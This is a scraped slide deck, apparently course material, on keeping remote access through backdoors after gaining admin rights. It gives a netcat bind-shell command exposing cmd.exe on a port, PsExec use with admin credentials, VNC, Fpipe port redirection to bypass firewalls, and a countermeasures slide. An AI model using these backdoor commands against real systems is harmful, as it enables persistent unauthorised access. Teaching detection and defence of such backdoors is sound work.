Download presentation
Presentation is loading. Please wait.
Published byHarry Chad Daniels Modified over 8 years ago
1
Remote Control & Backdoor Once administrative access has been gained hackers will maintain access through the backdoor remotely
2
Netcat example Nc –L –d –e cmd.exe –p 8080 Nc 192.168.0.13 8080
3
Psexec example Psexec \\192.168.0.13 –u adminlogin –p adminpassword –s cmd.exe\\192.168.0.13
4
GUI remote control Terminal services (check if port 3389 is open) Download winVNC from www.realvnc.com/download.html
5
Port redirection Used to get round firewalls Fpipe from www.foundstone.com
6
Countermeasures Net stop winvnc Winvnc –remove Download reg.exe from resource kit Problem is that remote access has been created using admin rights! Scan for file names and or file name changes Download trip wire www.tripwiresecuirty.comwww.tripwiresecuirty.com Check registry entries HKLM\SOFTWARE and HKEY_USERS\.DEFAULT\SOFTWARE also the RUN hive and startup files (msconfig) Monitor processes (download resource kit kill.exe) Check ports (netstat command and/or fport from www.foundstone.com
7
Exercise Install and run netcat remotely Install and Run fpipe
Similar presentations
© 2024 SlidePlayer.com Inc.
All rights reserved.